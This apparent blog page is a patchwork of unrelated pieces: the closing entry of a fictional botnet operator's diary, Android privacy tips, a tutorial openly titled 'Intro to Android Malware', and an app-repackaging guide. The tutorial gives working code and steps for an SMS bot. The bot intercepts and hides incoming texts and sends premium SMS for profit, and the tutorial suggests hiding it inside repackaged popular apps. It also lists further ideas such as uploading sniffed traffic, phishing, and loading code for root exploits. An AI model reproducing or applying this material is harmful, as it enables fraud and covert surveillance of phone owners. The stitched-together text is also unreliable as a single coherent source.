Not only am I back in “business” with a brand new botnet, but I’ve still got all those account details from the previous botnet that I can continue trading/reselling to other operators.

— I just realized that this diary is now precisely one month old. In that month I lost my job, founded two companies, become a CEO, built a botnet, lost a botnet, established a reputation in the hacker communities, opened an international banking account, and just purchased my second botnet.

Time to start pulling together the business plan for constructing a profitable money-making botnet! The “march to a million” sounds like a great idea, but I’d prefer to aim for Steve Austin’s The Six Million Dollar Man. I’m pretty confident that I can reach that target over the next 11 months! What would mom say?

Original BlackHat PDF file –

ZeuS Tracker Statistics –

Note: This is a fictitious (and subtly macabre, but hopefully humorous) diary account loosely based upon real investigations of professional botnet operators and the criminal enterprises they created to monetize the data and systems under their control. It does not represent a single botnet operator, rather it represents a concatenation of notable business models, decisions and discussions from a spectrum of criminal operators. Names and places have been deliberately altered. No animals were harmed in the making of this diary.


sms bot 4 Android in the onion

Privacy On The Android

gAtO think —everything that follows is for android phones only. I hate phones todays devices are a little to much power. As I predicted back in January cell devices will become the linch pin of corporate security. Nothing should be thought of as 100% safe or guaranteed and/or legal in your area these are just things that you should consider of course getting an iPhone may be easier. —/ cyber criminals are using the Android cell device in new ways bypassing your phones security—/  you should always do your own research and be a cyber critical user.

[1.] if you haven’t done it already, flash your android and put Cyanogen Mod 7 on there. just rooting your phone isn’t good enough. you need to flash it and get all that bullshit and bloatware off your phone. Info on how to do this can be found at

[2.] firewall your phone. Droidwall is a firewall based on iptables for linux. it will prevent data access to apps unless you specifically allow it. LBE Privacy Guard will limit access to specific functions for apps. for example, it will prevent apps that have no business requiring contact information or fine gps location from accessing said functions. LBE can also block apps from requesting IMEI info. both work very nicely with each other. LBE Privacy Guard does NOT prevent your carrier from accessing your location. it only prevents the apps you define from accessing the gps function, as well as almost any other function you choose. more information is available by searching the android market.

[3.] apply encryption and security to calls & texts. Redphone is an end-to-end encrypted VOIP app and TextSecure is an encrypted (you guessed it) app for texting. in order for these to work, the person you are trying to call or text must have the apps installed on their phone as well, so it’s not good for calling house phones or any other phones besides other androids, really. i believe apple blocked redphone from their app store so that’s just one more reason why apple sucks. both apps were written by moxie marlinspike and the guys over at whisper systems. there’s also another app by the guardian project for secure texting called Gibberbot that’s definitely worth checking out. more info is available in the android market or by visiting (or for gibberbot)

[4. ] delete exif data and obfuscate pictures. ObscuraCam by the guardian project can do just that. you can import pictures into ObscuraCam or you can use this app to take pictures with. it can remove exif data and it can pixelate faces to prevent facial recognition. (for those who don’t already know, exif data is identifying metadata embedded in pictures such as gps location, timestamps, phone make/model, etc. exif data exists on all pictures taken with digital cameras, not just phones). more info can be found in the android market or at

[5.] orbot is TOR for android and orweb is the accompanying browser. if you didn’t already know this, then you obviously don’t visit the TOR website enough. orbot works well with tethering and will allow you to surf anonymously even if you don’t have TOR on your computer. not sure how secure it is compared to regular TOR, and i certainly wouldn’t recommend doing anything too serious over your phone since your phone is basically a self imposed bug in your pocket, but if necessary, it’s better than the nothing. more info: the tor website or

Intro to Android Malware

Most of the malware people here are only working with desktop exploits and web apps (and servers), which is a bit disheartening since Android malware seems to have way more potential for much less effort. Not only that, but infected phones can be turned directly into a profit by abusing premium phone numbers and premium sms numbers. No need to deal with banking or credit card security measures, or with fraud detection. Plus, infected phones make incredible proxies because they’re almost always online, and there are fewer tools to detect them (has anyone even heard of a GSM/CDMA NIDS?).
i think it’s safe to say that most malware coders has never written an Android application and working in Tor to boot is a different mindset. i will, however, go over the app system by stepping through a program that intercepts SMS, listens for commands, and responds.Android App Overview

in the Android OS and this applies to most cell devices -/ in writing malware for android you must understand there are four “forms” that an application can take:

Activity – Service – Receiver – Provider

  • Activities run in the foreground.
  • Services either run in the background or provide an interface for functionality between applications.
  • Receivers act on publicized information.
  • Providers offer an interface to data between applications.

Anything you package should be declared in the AndroidManifest.xml file within the <application> section.

One important thing to note is that all of these are treated equally in a packaged application. The fact that a Receiver doesn’t have to interact with a user doesn’t mean that it can’t be packaged alone. With that, it’s possible to run code effectively on install since there’s no need to wait for a user to run your app before you can do something useful. Your options for this are to either package a Service and wait for someone to want to use your code, package a Provider and wait for someone to request data, or package a Receiver and wait for someone to publicize information.

Sniffing SMS

The Receiver option is the only one that doesn’t rely on other applications, so let’s create a Receiver.

  • Create a new class, SmsReceiver and make it extend android.content.BroadcastReceiver. All receivers must be a subclass of BroadcastReceiver
  • Create the following method, which is the one called when the system has a new message for a Receiver:

public void onReceive(Context context, Intent intent) {


  • Open up AndroidManifest.xml in Eclipse. Under the “Application” tab, find the section titled “Application Nodes”. Add a Receiver and set the “Name” to “.SmsReceiver”. The prepended dot is short for the application package name.
  • Highlight the “.SmsReceiver” row and Add an “Intent Filter”. All Receiver need to explicitly say what information they’re looking for, and his is how to do it. Set the Name to “android.provider.Telephony.SMS_RECEIVED”.
  • Now in AndroidManifest.xml, navigate to the “Permissions” tab. Add a “Uses Permission” named android.permission.RECEIVE_SMS. This is a requirement for any application that wants to receive the sms broadcast.

And with that, you have a class that receives all incoming SMS messages. To actually parse the message, I’m going to steal some code from the Android framework.

This code was copied (almost) directly from the Android source:

   public final SmsMessage[] getMessagesFromIntent(Intent intent) {

        Object[] messages = (Object[]) intent.getExtras().getSerializable(“pdus”);

        byte[][] pduObjs = new byte[messages.length][];

        for (int i = 0; i < messages.length; i++) {

            pduObjs[i] = (byte[]) messages[i];


        byte[][] pdus = new byte[pduObjs.length][];

        int pduCount = pdus.length;

        SmsMessage[] msgs = new SmsMessage[pduCount];  

        for (int i = 0; i < pduCount; i++) {

            pdus[i] = pduObjs[i];

            msgs[i] = SmsMessage.createFromPdu(pdus[i]);


            return msgs;


Now we can inspect the messages and react accordingly:

public void onReceive(Context context, Intent intent) {

      SmsMessage[] messages = this.getMessagesFromIntent(intent);

      for(SmsMessage msg : messages) {

         // sender can be found in msg.getDisplayOriginatingAddress()

         // body can be found in msg.getDisplayMessageBody()



Hiding SMS

So what if we decide that the message shouldn’t be shown to the user? If we’re the first ones to receive the broadcast, we can make sure nobody else gets it with a call to abortBroadcast(). To make sure we’re the first ones to get it, we need to raise our Receiver’s priority:

  • Open AndroidManifest.xml again and navigate to the “Application” tab.
  • Select the “Intent Filter” created earlier, and set “Priority” to “999”

For some broadcasts, a higher priority means you get the message earlier and can abort earlier. Beyond some number, you drop back down to the lowest priority. I haven’t tried to figure out the number (probably Integer.MAX_VALUE or Long.MAX_VALUE).

Sending SMS

Now to respond (or for premium sms), you need to be able to send sms:

  • AndroidManifest.xml, add the “android.permission.SEND_SMS” in the same way you added “android.permission.RECEIVE_SMS”

And… well, that’s pretty much it. You can now send sms messages with the following code:

SmsManager sm = SmsManager.getDefault();

sm.sendTextMessage(“phone-number-here”, null, “message”, null, null);

This is really all you need to start writing your own sms bot for Android. You can do basically anything without root exploits, as long as you can convince a user to keep the app on his phone. This isn’t a problem at all if you’re repackaging popular apps with this running in the background (see Sharing and Modding Android Apps). Keep in mind the root exploits are really only useful for hiding permissions from the user and staying on the phone after an uninstall (or preventing an uninstall).

If you have questions about this or some other Android features/malware, feel free to post here. I’m considering making an Android exploit kit, but I need there to be more interest in it. And if you’re having trouble coming up with other ideas…

  • Send annoying notifications until the user sends some sms (to avoid needing the SEND_SMS permission)
  • Load tcpdump to sniff all network traffic and upload the results to your server
  • Hijack bookmarked web pages for advanced phishing
  • Fake SMS for advanced phishing
  • Steal a huge amount of info and send SMS for advanced social engineering
  • Load code dynamically for future root exploits or for very flexible bots (or PPI)
  • Display ads while the user is away for revenue
  • etc, etc

Sharing and Modding Android Apps

This is a guide to move an app to your computer so you can mod it as you like. It isn’t a guide to cracking applications. This is an alternative to using an “App to SD” app, a lot of which are apparently buggy any don’t work on all apps. As far as I know, this method always works, and it gives you the option of automating the task.

Tools you’ll need

Android SDK: This comes with a bunch of tools you can use to communicate with your phone. The ones we care about are adb, used to communicate between your computer and a running android device, and android, a front-end to an android emulator.

Baksmali: This program understands and disassembles Android’s binaries to smali, an assembly language for Android applications.

Smali: This program converts smali assembly files into dex files. This will be used to apply any modifications to applications.

Java: You’ll need it to run baksmali. You can use your package manager to install this or use the link below. Remember to disable Java plugins in your web browser for being an infectious piece of shit.

Setting everything up

Unpack the Android SDK to any directory and navigate to the tools folder. You’ll see a bunch of executables in here. I’m going to assume that this folder is now in your PATH environment variable so you can access them from anywhere. Google “set path variable windows|linux|mac” if you don’t know how to do this.

Now create a folder anywhere named “apps” and copy both baksmali.jar and smali.jar into there. This is where your applications will be copied to. Open a terminal or command prompt and navigate to this directory. From this point on, I’ll assume that baksmali.jar and smali.jar are in the working directory.

Your phone should have come with a USB charger. This charger doubles as general way of talking to your phone (not just transfer files). To do this…

  • Hook up your phone to your computer using the USB charger
  • Navigate to Settings -> Applications -> Development
  • Enable USB Debugging

At this point, you can play around with a shell on your phone with

adb -d shell

Now we’ll have to grab some files from your phone so those platform-specific odex files can be converted to platform-independent dex files. These command will probably get everything you need (copy/paste is your friend):

adb -d pull /system/framework/services.odex

adb -d pull /system/framework/framework.odex

adb -d pull /system/framework/android.policy.odex

adb -d pull /system/framework/ext.odex

adb -d pull /system/framework/javax.obex.odex

adb -d pull /system/framework/core.odex

adb -d pull /system/framework/pm.odex

adb -d pull /system/framework/ime.odex

adb -d pull /system/framework/bmgr.odex

adb -d pull /system/framework/am.odex

adb -d pull /system/framework/input.odex

adb -d pull /system/framework/svc.odex

If a command in a later step ever complains about a missing file.odex, and if the application runs on your phone, then you should run the following to get that file:

adb -d pull /system/framework/file.odex

Copying over the apps

Now to actually grab an application. All installed applications are stored in /system/app. If you’ve ever developed an application, you probably know that an apk file is the format that Android knows how to install, and it contains everything about the app. So if you want to share an app with other people, that’s what you would need to grab. Unfortunately, Android splits up the actual code from the metadata, and the apk files in this folder only contain the metadata. The code code for MyApp.apk is stored in the optimized, platform-specific MyApp.odex. We’ll have to make this platform-agnostic and recombine the two files.

Pull both files.

adb -d pull /system/app/MyApp.apk

adb -d pull /system/app/MyApp.odex

And decompile the odex file so it can be easily modified:

java -jar baksmali.jar -x MyApp.odex -o MyApp

At this point, you can apply whatever changes you want before recompling the application into a platform-independent apk. To recompile the application:

java -jar smali.jar MyApp -o classes.dex

And move it into the apk file. This can be done with any zip-modifying utility, like 7zip. I like to do this using the zip utility in linux:

zip -g MyApp.apk classes.dex

And that’s all! If you want to re-install the application, you’ll have to resign the new apk following the instructions in the following link. If anyone asks for it, I can append an abridged guide here.

Congratulations! You can now modify and share your Android applications! Post here if you have any problems following this guide, I’ll be glad to help.